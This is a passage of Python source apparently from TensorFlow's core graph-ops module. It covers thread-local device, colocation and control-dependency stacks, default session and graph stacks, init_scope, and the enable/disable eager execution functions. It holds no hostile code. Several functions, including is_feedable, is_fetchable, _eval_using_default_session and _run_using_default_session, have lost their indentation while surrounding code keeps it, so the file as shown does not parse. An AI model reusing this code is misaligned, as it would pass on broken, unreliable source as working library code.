    if not isinstance(op_type_map, dict):
      raise TypeError("op_type_map must be a dictionary mapping "
                      "strings to strings")
    # The saved_mappings dictionary stores any currently-set mappings that
    # will be overridden by this context manager.
    saved_mappings = {}
    # Install the given label
    for op_type, mapped_op_type in op_type_map.items():
      if not (isinstance(op_type, six.string_types) and
              isinstance(mapped_op_type, six.string_types)):
        raise TypeError("op_type_map must be a dictionary mapping "
                        "strings to strings")
      try:
        saved_mappings[op_type] = self._gradient_override_map[op_type]
      except KeyError:
        pass
      self._gradient_override_map[op_type] = mapped_op_type
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the labels set for this context, and restore any saved labels.
      for op_type, mapped_op_type in op_type_map.items():
        try:
          self._gradient_override_map[op_type] = saved_mappings[op_type]
        except KeyError:
          del self._gradient_override_map[op_type]
  # pylint: enable=g-doc-return-or-yield
  def prevent_feeding(self, tensor):
    """Marks the given `tensor` as unfeedable in this graph."""
    # After this call, `is_feedable(tensor)` returns False.
    self._unfeedable_tensors.add(tensor)
def is_feedable(self, tensor):
"""Returns `True` if and only if `tensor` is feedable."""
return tensor not in self._unfeedable_tensors
  def prevent_fetching(self, op):
    """Marks the given `op` as unfetchable in this graph."""
    # After this call, `is_fetchable(op)` returns False (as does
    # `is_fetchable(t)` for any tensor `t` produced by `op`).
    self._unfetchable_ops.add(op)
def is_fetchable(self, tensor_or_op):
"""Returns `True` if and only if `tensor_or_op` is fetchable."""
if isinstance(tensor_or_op, Tensor):
return tensor_or_op.op not in self._unfetchable_ops
else:
return tensor_or_op not in self._unfetchable_ops
  def switch_to_thread_local(self):
    """Make device, colocation and dependencies stacks thread-local.

    Device, colocation and dependencies stacks are not thread-local by default.
    If multiple threads access them, then the state is shared.  This means that
    one thread may affect the behavior of another thread.

    After this method is called, the stacks become thread-local.  If multiple
    threads access them, then the state is not shared.  Each thread uses its own
    value; a thread doesn't affect other threads by mutating such a stack.

    The initial value for every thread's stack is set to the current value
    of the stack when `switch_to_thread_local()` was first called.
    """
    # The flag is one-way: once set, the stack properties below read/write the
    # thread-local copies instead of the graph-wide stacks.
    if not self._stack_state_is_thread_local:
      self._stack_state_is_thread_local = True
  @property
  def _device_function_stack(self):
    """The device function stack (thread-local after `switch_to_thread_local`)."""
    if self._stack_state_is_thread_local:
      # This may be called from a thread where device_function_stack doesn't yet
      # exist.
      # pylint: disable=protected-access
      if not hasattr(self._thread_local, "_device_function_stack"):
        # First access from this thread: snapshot the graph-wide stack so the
        # thread starts from the state at switch time.
        stack_copy_for_this_thread = self._graph_device_function_stack.copy()
        self._thread_local._device_function_stack = stack_copy_for_this_thread
      return self._thread_local._device_function_stack
      # pylint: enable=protected-access
    else:
      return self._graph_device_function_stack
@property
def _device_functions_outer_to_inner(self):
user_device_specs = self._device_function_stack.peek_objs()
device_functions = [spec.function for spec in user_device_specs]
device_functions_outer_to_inner = list(reversed(device_functions))
return device_functions_outer_to_inner
def _snapshot_device_function_stack_metadata(self):
"""Return device function stack as a list of TraceableObjects.
Returns:
[traceable_stack.TraceableObject, ...] where each TraceableObject's .obj
member is a displayable name for the user's argument to Graph.device, and
the filename and lineno members point to the code location where
Graph.device was called directly or indirectly by the user.
"""
snapshot = []
for obj in self._device_function_stack.peek_traceable_objs():
obj_copy = obj.copy_metadata()
obj_copy.obj = obj.obj.display_name
snapshot.append(obj_copy)
return snapshot
  @_device_function_stack.setter
  def _device_function_stack(self, device_function_stack):
    """Replaces the device function stack (thread-local copy if switched)."""
    if self._stack_state_is_thread_local:
      # pylint: disable=protected-access
      self._thread_local._device_function_stack = device_function_stack
      # pylint: enable=protected-access
    else:
      self._graph_device_function_stack = device_function_stack
  @property
  def _colocation_stack(self):
    """Return thread-local copy of colocation stack."""
    if self._stack_state_is_thread_local:
      # This may be called from a thread where colocation_stack doesn't yet
      # exist.
      # pylint: disable=protected-access
      if not hasattr(self._thread_local, "_colocation_stack"):
        # First access from this thread: snapshot the graph-wide stack.
        stack_copy_for_this_thread = self._graph_colocation_stack.copy()
        self._thread_local._colocation_stack = stack_copy_for_this_thread
      return self._thread_local._colocation_stack
      # pylint: enable=protected-access
    else:
      return self._graph_colocation_stack
  def _snapshot_colocation_stack_metadata(self):
    """Return colocation stack metadata as a dictionary."""
    # Keyed by the colocated op's name; values are metadata-only copies.
    return {
        traceable_obj.obj.name: traceable_obj.copy_metadata()
        for traceable_obj in self._colocation_stack.peek_traceable_objs()
    }
  @_colocation_stack.setter
  def _colocation_stack(self, colocation_stack):
    """Replaces the colocation stack (thread-local copy if switched)."""
    if self._stack_state_is_thread_local:
      # pylint: disable=protected-access
      self._thread_local._colocation_stack = colocation_stack
      # pylint: enable=protected-access
    else:
      self._graph_colocation_stack = colocation_stack
  @property
  def _control_dependencies_stack(self):
    """The control-dependency controller stack (thread-local if switched)."""
    if self._stack_state_is_thread_local:
      # This may be called from a thread where control_dependencies_stack
      # doesn't yet exist.
      if not hasattr(self._thread_local, "_control_dependencies_stack"):
        # First access from this thread: shallow-copy the graph-wide stack.
        self._thread_local._control_dependencies_stack = (
            self._graph_control_dependencies_stack[:])
      return self._thread_local._control_dependencies_stack
    else:
      return self._graph_control_dependencies_stack
  @_control_dependencies_stack.setter
  def _control_dependencies_stack(self, control_dependencies):
    """Replaces the control-dependency stack (thread-local copy if switched)."""
    if self._stack_state_is_thread_local:
      self._thread_local._control_dependencies_stack = control_dependencies
    else:
      self._graph_control_dependencies_stack = control_dependencies
  @property
  def _distribution_strategy_stack(self):
    """A stack to maintain distribution strategy context for each thread."""
    # Unlike the device/colocation stacks, this one is always thread-local.
    if not hasattr(self._thread_local, "_distribution_strategy_stack"):
      self._thread_local._distribution_strategy_stack = []  # pylint: disable=protected-access
    return self._thread_local._distribution_strategy_stack  # pylint: disable=protected-access
  @_distribution_strategy_stack.setter
  def _distribution_strategy_stack(self, _distribution_strategy_stack):
    """Replaces this thread's distribution strategy stack."""
    self._thread_local._distribution_strategy_stack = (  # pylint: disable=protected-access
        _distribution_strategy_stack)
  @property
  def _global_distribute_strategy_scope(self):
    """For implementing `tf.distribute.set_strategy()`."""
    # Lazily initialized to None (no global strategy scope) per thread.
    if not hasattr(self._thread_local, "distribute_strategy_scope"):
      self._thread_local.distribute_strategy_scope = None
    return self._thread_local.distribute_strategy_scope
@_global_distribute_strategy_scope.setter
def _global_distribute_strategy_scope(self, distribute_strategy_scope):
self._thread_local.distribute_strategy_scope = (distribute_strategy_scope)
  @property
  def _auto_cast_variable_read_dtype(self):
    """The dtype that instances of `AutoCastVariable` will be casted to.

    This is None if `AutoCastVariables` should not be casted.

    See `AutoCastVariable` for more information.

    Returns:
      The dtype that instances of `AutoCastVariable` will be casted to.
    """
    # Lazily initialized per thread; None disables auto-casting.
    if not hasattr(self._thread_local, "_auto_cast_variable_read_dtype"):
      self._thread_local._auto_cast_variable_read_dtype = None  # pylint: disable=protected-access
    return self._thread_local._auto_cast_variable_read_dtype  # pylint: disable=protected-access
  @_auto_cast_variable_read_dtype.setter
  def _auto_cast_variable_read_dtype(self, dtype):
    """Sets this thread's auto-cast dtype; falsy values disable casting."""
    # NOTE: falsy values (e.g. None) are stored as-is without conversion.
    if dtype:
      dtype = dtypes.as_dtype(dtype)
    self._thread_local._auto_cast_variable_read_dtype = dtype  # pylint: disable=protected-access
  @tf_contextlib.contextmanager
  def _enable_auto_casting_variables(self, dtype):
    """Context manager to automatically cast AutoCastVariables.

    If an AutoCastVariable `var` is used under this context manager, it will be
    casted to `dtype` before being used.

    See `AutoCastVariable` for more information.

    Args:
      dtype: The dtype that AutoCastVariables should be casted to.

    Yields:
      Nothing.
    """
    # Save and restore the previous dtype so these contexts nest correctly.
    prev_read_dtype = self._auto_cast_variable_read_dtype
    try:
      self._auto_cast_variable_read_dtype = dtype
      yield
    finally:
      self._auto_cast_variable_read_dtype = prev_read_dtype
  def _mutation_lock(self):
    """Returns a lock to guard code that creates & mutates ops.

    See the comment for self._group_lock for more info.
    """
    # Acquires the mutation group of the graph's group lock.
    return self._group_lock.group(_MUTATION_LOCK_GROUP)
  def _session_run_lock(self):
    """Returns a lock to guard code for Session.run.

    See the comment for self._group_lock for more info.
    """
    # Acquires the session-run group of the graph's group lock.
    return self._group_lock.group(_SESSION_RUN_LOCK_GROUP)
# TODO(agarwal): currently device directives in an outer eager scope will not
# apply to inner graph mode code. Fix that.
@tf_export(v1=["device"])
def device(device_name_or_function):
  """Wrapper for `Graph.device()` using the default graph.

  See `tf.Graph.device` for more details.

  Args:
    device_name_or_function: The device name or function to use in the context.

  Returns:
    A context manager that specifies the default device to use for newly
    created ops.

  Raises:
    RuntimeError: If eager execution is enabled and a function is passed in.
  """
  if context.executing_eagerly():
    # In pure eager mode only concrete device names make sense.
    if callable(device_name_or_function):
      raise RuntimeError(
          "tf.device does not support functions when eager execution "
          "is enabled.")
    return context.device(device_name_or_function)
  elif executing_eagerly_outside_functions():
    @tf_contextlib.contextmanager
    def combined(device_name_or_function):
      # Apply the device to the default graph and, when it is a concrete name
      # (not a device function), also to the eager context so both graph and
      # eager ops inside the block are placed consistently.
      with get_default_graph().device(device_name_or_function):
        if not callable(device_name_or_function):
          with context.device(device_name_or_function):
            yield
        else:
          yield
    return combined(device_name_or_function)
  else:
    return get_default_graph().device(device_name_or_function)
@tf_export("device", v1=[])
def device_v2(device_name):
  """Specifies the device for ops created/executed in this context.

  `device_name` can be fully specified, as in "/job:worker/task:1/device:cpu:0",
  or partially specified, containing only a subset of the "/"-separated
  fields. Any fields which are specified override device annotations from outer
  scopes. For example:

  ```python
  with tf.device('/job:foo'):
    # ops created here have devices with /job:foo
    with tf.device('/job:bar/task:0/device:gpu:2'):
      # ops created here have the fully specified device above
    with tf.device('/device:gpu:1'):
      # ops created here have the device '/job:foo/device:gpu:1'
  ```

  Args:
    device_name: The device name to use in the context.

  Returns:
    A context manager that specifies the default device to use for newly
    created ops.

  Raises:
    RuntimeError: If a function is passed in.
  """
  # Unlike the v1 `tf.device`, device functions are rejected unconditionally.
  if callable(device_name):
    raise RuntimeError("tf.device does not support functions.")
  return device(device_name)
@tf_export(v1=["container"])
def container(container_name):
  """Wrapper for `Graph.container()` using the default graph.

  See `tf.Graph.container` for more details.

  Args:
    container_name: The container string to use in the context.

  Returns:
    A context manager that specifies the default container to use for newly
    created stateful ops.
  """
  return get_default_graph().container(container_name)
def _colocate_with_for_gradient(op, gradient_uid, ignore_existing=False):
  """Returns a context manager colocating created ops with `op` for gradients.

  Args:
    op: The op (or value convertible to a tensor/indexed-slices) to colocate
      with, or None.
    gradient_uid: Identifier for the gradient computation; forwarded to
      `Graph._colocate_with_for_gradient`.
    ignore_existing: Forwarded to `Graph._colocate_with_for_gradient`.

  Returns:
    A context manager.

  Raises:
    ValueError: If an `EagerTensor` is encountered during graph construction
      while no function is being built.
  """
  if context.executing_eagerly():
    if op is not None:
      # Convert values without a `device` attribute so the device can be read.
      if not hasattr(op, "device"):
        op = internal_convert_to_tensor_or_indexed_slices(op)
      return device(op.device)
    else:
      return NullContextmanager()
  else:
    default_graph = get_default_graph()
    if isinstance(op, EagerTensor):
      if default_graph.building_function:
        return default_graph.device(op.device)
      else:
        raise ValueError("Encountered an Eager-defined Tensor during graph "
                         "construction, but a function was not being built.")
    return default_graph._colocate_with_for_gradient(
        op, gradient_uid=gradient_uid, ignore_existing=ignore_existing)
# Internal interface to colocate_with. colocate_with has been deprecated from
# public API. There are still a few internal uses of colocate_with. Add internal
# only API for those uses to avoid deprecation warning.
def colocate_with(op, ignore_existing=False):
  """Internal, non-deprecated alias for the public `colocate_with`."""
  return _colocate_with_for_gradient(op, None, ignore_existing=ignore_existing)
@deprecation.deprecated(
    date=None, instructions="Colocations handled automatically by placer.")
@tf_export(v1=["colocate_with"])
def _colocate_with(op, ignore_existing=False):
  """Deprecated public wrapper; delegates to the internal `colocate_with`."""
  return colocate_with(op, ignore_existing)
@tf_export("control_dependencies")
def control_dependencies(control_inputs):
  """Wrapper for `Graph.control_dependencies()` using the default graph.

  See `tf.Graph.control_dependencies`
  for more details.

  When eager execution is enabled, any callable object in the `control_inputs`
  list will be called.

  Args:
    control_inputs: A list of `Operation` or `Tensor` objects which must be
      executed or computed before running the operations defined in the context.
      Can also be `None` to clear the control dependencies. If eager execution
      is enabled, any callable object in the `control_inputs` list will be
      called.

  Returns:
    A context manager that specifies control dependencies for all
    operations constructed within the context.
  """
  if context.executing_eagerly():
    # Eager mode has no graph to attach control edges to; ordering is already
    # sequential, so only pending callables need to run.
    if control_inputs:
      # Execute any pending callables.
      for control in control_inputs:
        if callable(control):
          control()
    return NullContextmanager()
  else:
    return get_default_graph().control_dependencies(control_inputs)
class _DefaultStack(threading.local):
  """A thread-local stack of objects for providing implicit defaults."""

  def __init__(self):
    super(_DefaultStack, self).__init__()
    self._enforce_nesting = True
    self.stack = []

  def get_default(self):
    """Returns the innermost default object, or None if the stack is empty."""
    # Idiomatic truthiness test instead of `len(self.stack) >= 1`.
    return self.stack[-1] if self.stack else None

  def reset(self):
    """Clears the stack for this thread."""
    self.stack = []

  def is_cleared(self):
    """Returns True if the stack is empty."""
    return not self.stack

  @property
  def enforce_nesting(self):
    return self._enforce_nesting

  @enforce_nesting.setter
  def enforce_nesting(self, value):
    self._enforce_nesting = value

  @tf_contextlib.contextmanager
  def get_controller(self, default):
    """A context manager for manipulating a default stack."""
    self.stack.append(default)
    try:
      yield default
    finally:
      # stack may be empty if reset() was called
      if self.stack:
        if self._enforce_nesting:
          if self.stack[-1] is not default:
            raise AssertionError(
                "Nesting violated for default stack of %s objects" %
                type(default))
          self.stack.pop()
        else:
          # Non-nested exits are tolerated: remove wherever `default` sits.
          self.stack.remove(default)
# Thread-local stack of sessions installed as defaults (see default_session()).
_default_session_stack = _DefaultStack()  # pylint: disable=protected-access
def default_session(session):
  """Python "with" handler for defining a default session.

  This function provides a means of registering a session for handling
  Tensor.eval() and Operation.run() calls. It is primarily intended for use
  by session.Session, but can be used with any object that implements
  the Session.run() interface.

  Use with the "with" keyword to specify that Tensor.eval() and Operation.run()
  invocations within the scope of a block should be executed by a particular
  session.

  The default session applies to the current thread only, so it is always
  possible to inspect the call stack and determine the scope of a default
  session. If you create a new thread, and wish to use the default session
  in that thread, you must explicitly add a "with ops.default_session(sess):"
  block in that thread's function.

  Example:
    The following code examples are equivalent:

    # 1. Using the Session object directly:
    sess = ...
    c = tf.constant(5.0)
    sess.run(c)

    # 2. Using default_session():
    sess = ...
    with ops.default_session(sess):
      c = tf.constant(5.0)
      result = c.eval()

    # 3. Overriding default_session():
    sess = ...
    with ops.default_session(sess):
      c = tf.constant(5.0)
      with ops.default_session(...):
        c.eval(session=sess)

  Args:
    session: The session to be installed as the default session.

  Returns:
    A context manager for the default session.
  """
  return _default_session_stack.get_controller(session)
@tf_export(v1=["get_default_session"])
def get_default_session():
  """Returns the default session for the current thread.

  The returned `Session` will be the innermost session on which a
  `Session` or `Session.as_default()` context has been entered.

  NOTE: The default session is a property of the current thread. If you
  create a new thread, and wish to use the default session in that
  thread, you must explicitly add a `with sess.as_default():` in that
  thread's function.

  Returns:
    The default `Session` being used in the current thread, or `None` if no
    session has been installed.
  """
  return _default_session_stack.get_default()
def _eval_using_default_session(tensors, feed_dict, graph, session=None):
"""Uses the default session to evaluate one or more tensors.
Args:
tensors: A single Tensor, or a list of Tensor objects.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which the tensors are defined.
session: (Optional) A different session to use to evaluate "tensors".
Returns:
Either a single numpy ndarray if "tensors" is a single tensor; or a list
of numpy ndarrays that each correspond to the respective element in
"tensors".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot evaluate tensor using `eval()`: No default "
"session is registered. Use `with "
"sess.as_default()` or pass an explicit session to "
"`eval(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph. Pass an explicit session to "
"`eval(session=sess)`.")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph.")
return session.run(tensors, feed_dict)
def _run_using_default_session(operation, feed_dict, graph, session=None):
"""Uses the default session to run "operation".
Args:
operation: The Operation to be run.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which "operation" is defined.
session: (Optional) A different session to use to run "operation".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot execute operation using `run()`: No default "
"session is registered. Use `with "
"sess.as_default():` or pass an explicit session to "
"`run(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to execute operation: "
"the operation's graph is different from the "
"session's graph. Pass an explicit session to "
"run(session=sess).")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to execute operation: "
"the operation's graph is different from the session's "
"graph.")
session.run(operation, feed_dict)
class _DefaultGraphStack(_DefaultStack):  # pylint: disable=protected-access
  """A thread-local stack of objects for providing an implicit default graph."""

  def __init__(self):
    super(_DefaultGraphStack, self).__init__()
    # Lazily created global fallback graph, shared across threads.
    self._global_default_graph = None

  def get_default(self):
    """Override that returns a global default if the stack is empty."""
    ret = super(_DefaultGraphStack, self).get_default()
    if ret is None:
      ret = self._GetGlobalDefaultGraph()
    return ret

  def _GetGlobalDefaultGraph(self):
    """Returns the process-wide fallback graph, creating it on first use."""
    if self._global_default_graph is None:
      # TODO(mrry): Perhaps log that the default graph is being used, or set
      #   provide some other feedback to prevent confusion when a mixture of
      #   the global default graph and an explicit graph are combined in the
      #   same process.
      self._global_default_graph = Graph()
    return self._global_default_graph

  def reset(self):
    """Clears the stack and drops the global fallback graph."""
    super(_DefaultGraphStack, self).reset()
    self._global_default_graph = None

  @tf_contextlib.contextmanager
  def get_controller(self, default):
    """Pushes `default` and records the switch in the eager context log."""
    context.context().context_switches.push(default.building_function,
                                            default.as_default,
                                            default._device_function_stack)
    try:
      with super(_DefaultGraphStack,
                 self).get_controller(default) as g, context.graph_mode():
        yield g
    finally:
      # If an exception is raised here it may be hiding a related exception in
      # the try-block (just above).
      context.context().context_switches.pop()
# Thread-local stack of graphs installed as defaults via `as_default()`.
_default_graph_stack = _DefaultGraphStack()
# Shared helper used in init_scope and executing_eagerly_outside_functions
# to obtain the outermost context that is not building a function, and the
# innermost non-empty device stack.
def _get_outer_context_and_inner_device_stack():
  """Get the outermost context not building a function.

  Returns:
    A tuple `(outer_context, innermost_nonempty_device_stack)` where
    `outer_context` is a callable that enters the outermost context not
    building a function (e.g. a graph's `as_default`), and
    `innermost_nonempty_device_stack` is the innermost non-empty device
    stack found while walking the recorded context switches.

  Raises:
    RuntimeError: If the global graph is building a function, or if every
      recorded context is building a function and no eager context was
      previously active.
  """
  default_graph = get_default_graph()
  outer_context = None
  innermost_nonempty_device_stack = default_graph._device_function_stack  # pylint: disable=protected-access
  if not _default_graph_stack.stack:
    # If the default graph stack is empty, then we cannot be building a
    # function. Install the global graph (which, in this case, is also the
    # default graph) as the outer context.
    if default_graph.building_function:
      raise RuntimeError("The global graph is building a function.")
    outer_context = default_graph.as_default
  else:
    # Find a context that is not building a function.
    # Walk the context-switch log from innermost to outermost.
    for stack_entry in reversed(context.context().context_switches.stack):
      if not innermost_nonempty_device_stack:
        innermost_nonempty_device_stack = stack_entry.device_stack
      if not stack_entry.is_building_function:
        outer_context = stack_entry.enter_context_fn
        break
    if outer_context is None:
      # As a last resort, obtain the global default graph; this graph doesn't
      # necessarily live on the graph stack (and hence it doesn't necessarily
      # live on the context stack), but it is stored in the graph stack's
      # encapsulating object.
      outer_context = _default_graph_stack._GetGlobalDefaultGraph().as_default  # pylint: disable=protected-access
  if outer_context is None:
    # Sanity check; this shouldn't be triggered.
    raise RuntimeError("All graphs are building functions, and no "
                       "eager context was previously active.")
  return outer_context, innermost_nonempty_device_stack
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_export("init_scope")
@tf_contextlib.contextmanager
def init_scope():
  """A context manager that lifts ops out of control-flow scopes and function-building graphs.

  There is often a need to lift variable initialization ops out of control-flow
  scopes, function-building graphs, and gradient tapes. Entering an
  `init_scope` is a mechanism for satisfying these desiderata. In particular,
  entering an `init_scope` has three effects:

    (1) All control dependencies are cleared the moment the scope is entered;
        this is equivalent to entering the context manager returned from
        `control_dependencies(None)`, which has the side-effect of exiting
        control-flow scopes like `tf.cond` and `tf.while_loop`.

    (2) All operations that are created while the scope is active are lifted
        into the lowest context on the `context_stack` that is not building a
        graph function. Here, a context is defined as either a graph or an eager
        context. Every context switch, i.e., every installation of a graph as
        the default graph and every switch into eager mode, is logged in a
        thread-local stack called `context_switches`; the log entry for a
        context switch is popped from the stack when the context is exited.
        Entering an `init_scope` is equivalent to crawling up
        `context_switches`, finding the first context that is not building a
        graph function, and entering it. A caveat is that if graph mode is
        enabled but the default graph stack is empty, then entering an
        `init_scope` will simply install a fresh graph as the default one.

    (3) The gradient tape is paused while the scope is active.

  When eager execution is enabled, code inside an init_scope block runs with
  eager execution enabled even when defining graph functions via
  tf.contrib.eager.defun. For example:

  ```python
  tf.compat.v1.enable_eager_execution()

  @tf.contrib.eager.defun
  def func():
    # A defun-decorated function constructs TensorFlow graphs,
    # it does not execute eagerly.
    assert not tf.executing_eagerly()
    with tf.init_scope():
      # Initialization runs with eager execution enabled
      assert tf.executing_eagerly()
  ```

  Raises:
    RuntimeError: if graph state is incompatible with this initialization.
  """
  # pylint: enable=g-doc-return-or-yield,line-too-long

  if context.executing_eagerly():
    # Fastpath: in pure eager mode there is nothing to lift out of; just
    # pause the gradient tape for the duration of the scope.
    with tape.stop_recording():
      yield
  else:
    # Retrieve the active name scope: entering an `init_scope` preserves
    # the name scope of the current context.
    scope = get_default_graph().get_name_scope()
    if scope and scope[-1] != "/":
      # Names that end with trailing slashes are treated by `name_scope` as
      # absolute.
      scope = scope + "/"

    outer_context, innermost_nonempty_device_stack = (
        _get_outer_context_and_inner_device_stack())

    outer_graph = None
    outer_device_stack = None
    try:
      with outer_context(), name_scope(scope), control_dependencies(
          None), tape.stop_recording():
        # Default to a no-op device context; may be replaced below when
        # lifting into an eager context with a usable device spec.
        context_manager = NullContextmanager
        context_manager_input = None
        if not context.executing_eagerly():
          # The device stack is preserved when lifting into a graph. Eager
          # execution doesn't implement device stacks and in particular it
          # doesn't support device functions, so in general it's not possible
          # to do the same when lifting into the eager context.
          outer_graph = get_default_graph()
          outer_device_stack = outer_graph._device_function_stack  # pylint: disable=protected-access
          outer_graph._device_function_stack = innermost_nonempty_device_stack  # pylint: disable=protected-access
        elif innermost_nonempty_device_stack is not None:
          for device_spec in innermost_nonempty_device_stack.peek_objs():
            if device_spec.function is None:
              break
            if device_spec.raw_string:
              context_manager = context.device
              context_manager_input = device_spec.raw_string
              break
            # It is currently not possible to have a device function in V2,
            # but in V1 we are unable to apply device functions in eager mode.
            # This means that we will silently skip some of the entries on the
            # device stack in V1 + eager mode.

        with context_manager(context_manager_input):
          yield
    finally:
      # If an exception is raised here it may be hiding a related exception
      # in the try-block (just above).
      if outer_graph is not None:
        # Restore the graph's original device stack.
        outer_graph._device_function_stack = outer_device_stack  # pylint: disable=protected-access
def executing_eagerly_outside_functions():
  """Returns True if executing eagerly, even if inside a graph function."""
  if context.executing_eagerly():
    # Fast path: the innermost context is already eager.
    return True
  # Otherwise, temporarily enter the outermost context that is not building
  # a function and ask again.
  outer_context, _ = _get_outer_context_and_inner_device_stack()
  with outer_context():
    return context.executing_eagerly()
def inside_function():
  """Returns True if the default graph is currently building a function."""
  graph = get_default_graph()
  return graph.building_function
@tf_export(v1=["enable_eager_execution"])
def enable_eager_execution(config=None, device_policy=None,
                           execution_mode=None):
  """Enables eager execution for the lifetime of this program.

  Eager execution provides an imperative interface to TensorFlow: with it
  enabled, TensorFlow operations run immediately and return concrete values
  instead of adding nodes to a graph to be executed later through a
  `tf.compat.v1.Session`.

  For example:

  ```python
  tf.compat.v1.enable_eager_execution()

  # After eager execution is enabled, operations are executed as they are
  # defined and Tensor objects hold concrete values, which can be accessed as
  # numpy.ndarray`s through the numpy() method.
  assert tf.multiply(6, 7).numpy() == 42
  ```

  Eager execution cannot be enabled after TensorFlow APIs have been used to
  create or execute graphs. Invoke this function at program startup, not
  inside a library (most libraries should be usable both with and without
  eager execution).

  Args:
    config: (Optional.) A `tf.compat.v1.ConfigProto` describing the
      environment in which operations are executed. Note that
      `tf.compat.v1.ConfigProto` also configures graph execution (via
      `tf.compat.v1.Session`), and many of its options are not implemented
      (or are irrelevant) when eager execution is enabled.
    device_policy: (Optional.) Policy controlling how operations requiring
      inputs on a specific device (e.g., a GPU 0) handle inputs on a different
      device (e.g. GPU 1 or CPU). When set to None, an appropriate value will
      be picked automatically; the value picked may change between TensorFlow
      releases.
      Valid values:
      - tf.contrib.eager.DEVICE_PLACEMENT_EXPLICIT: raises an error if the
        placement is not correct.
      - tf.contrib.eager.DEVICE_PLACEMENT_WARN: copies the tensors which are
        not on the right device but logs a warning.
      - tf.contrib.eager.DEVICE_PLACEMENT_SILENT: silently copies the tensors.
        Note that this may hide performance problems as there is no
        notification provided when operations are blocked on the tensor being
        copied between devices.
      - tf.contrib.eager.DEVICE_PLACEMENT_SILENT_FOR_INT32: silently copies
        int32 tensors, raising errors on the other ones.
    execution_mode: (Optional.) Policy controlling how dispatched operations
      are actually executed. When set to None, an appropriate value will be
      picked automatically; the value picked may change between TensorFlow
      releases.
      Valid values:
      - tf.contrib.eager.SYNC: executes each operation synchronously.
      - tf.contrib.eager.ASYNC: executes each operation asynchronously. These
        operations may return "non-ready" handles.

  Raises:
    ValueError: If eager execution is enabled after creating/executing a
      TensorFlow graph, or if options provided conflict with a previous call
      to this function.
  """
  _api_usage_gauge.get_cell().set(True)
  if context.default_execution_mode == context.EAGER_MODE:
    # Already in eager mode; nothing to do.
    return None
  return enable_eager_execution_internal(
      config=config,
      device_policy=device_policy,
      execution_mode=execution_mode,
      server_def=None)
@tf_export(v1=["disable_eager_execution"])
def disable_eager_execution():
  """Disables eager execution.

  This function can only be called before any Graphs, Ops, or Tensors have
  been created. It is intended for use at the beginning of the program in
  complex TensorFlow 1.x to 2.x migration projects.
  """
  _api_usage_gauge.get_cell().set(False)
  context.default_execution_mode = context.GRAPH_MODE
  ctx = context.context_safe()
  if ctx is None:
    return
  # A context already exists: also flip its thread-local eager flag.
  ctx._thread_local_data.is_eager = False  # pylint: disable=protected-access
def enable_eager_execution_internal(config=None,
                                    device_policy=None,
                                    execution_mode=None,
                                    server_def=None):
  """Enables eager execution for the lifetime of this program.

  Most of the doc string for enable_eager_execution is relevant here as well.

  Args:
    config: See enable_eager_execution doc string
    device_policy: See enable_eager_execution doc string
    execution_mode: See enable_eager_execution doc string
    server_def: (Optional.) A tensorflow::ServerDef proto. Enables execution on
      remote devices. GrpcServers need to be started by creating an identical
      server_def to this, and setting the appropriate task_indexes, so that the
      servers can communicate. It will then be possible to execute operations on
      remote devices.

  Raises:
    TypeError: if `config` is provided but is not a `tf.compat.v1.ConfigProto`.
    ValueError: if `device_policy` or `execution_mode` is invalid, if graph
      mode has already been used, or if the options conflict with an already
      active eager context.
  """
  # Validate all options before mutating any global state.
  if config is not None and not isinstance(config, config_pb2.ConfigProto):
    raise TypeError("config must be a tf.ConfigProto, but got %s" %
                    type(config))
  if device_policy not in (None, context.DEVICE_PLACEMENT_EXPLICIT,
                           context.DEVICE_PLACEMENT_WARN,
                           context.DEVICE_PLACEMENT_SILENT,
                           context.DEVICE_PLACEMENT_SILENT_FOR_INT32):
    raise ValueError(
        "device_policy must be one of None, tf.contrib.eager.DEVICE_PLACEMENT_*"
    )
  if execution_mode not in (None, context.SYNC, context.ASYNC):
    raise ValueError(
        "execution_mode must be one of None, tf.contrib.eager.SYNC, "
        "tf.contrib.eager.ASYNC")
  if context.default_execution_mode == context.GRAPH_MODE:
    # Eager execution must be enabled before any graph work has happened;
    # the global default graph being materialized is the tell-tale sign.
    graph_mode_has_been_used = (
        _default_graph_stack._global_default_graph is not None)  # pylint: disable=protected-access
    if graph_mode_has_been_used:
      raise ValueError(
          "tf.enable_eager_execution must be called at program startup.")
  context.default_execution_mode = context.EAGER_MODE
  # pylint: disable=protected-access
  with context._context_lock:
    if context._context is None:
      context._set_context_locked(context.Context(
          config=config,
          device_policy=device_policy,
          execution_mode=execution_mode,
          server_def=server_def))
    # NOTE: options are compared by identity (`is not`), not equality, so
    # passing an equal-but-distinct ConfigProto to a live context raises.
    elif ((config is not None and config is not context._context._config) or
          (device_policy is not None and
           device_policy is not context._context._device_policy) or
          (execution_mode is not None and
           execution_mode is not context._context._execution_mode)):
      raise ValueError(
          "Trying to change the options of an active eager"
          " execution. Context config: %s, specified config:"
          " %s. Context device policy: %s, specified device"
          " policy: %s. Context execution mode: %s, "
          " specified execution mode %s." %
          (context._context._config, config, context._context._device_policy,
           device_policy, context._context._execution_mode, execution_mode))
    else:
      # We already created everything, so update the thread local data.
      context._context._thread_local_data.is_eager = True

  # Monkey patch to get rid of an unnecessary conditional since the context is
  # now initialized.
  context.context = context.context_safe
def eager_run(main=None, argv=None):
  """Runs the program with an optional main function and argv list.

  Equivalent to `tf.compat.v1.app.run`, except that eager execution is
  enabled for the lifetime of the program first.

  Example:

  ```python
  import tensorflow as tf
  # Import subject to future changes:
  from tensorflow.contrib.eager.python import tfe

  def main(_):
    u = tf.constant(6.0)
    v = tf.constant(7.0)
    print(u * v)

  if __name__ == "__main__":
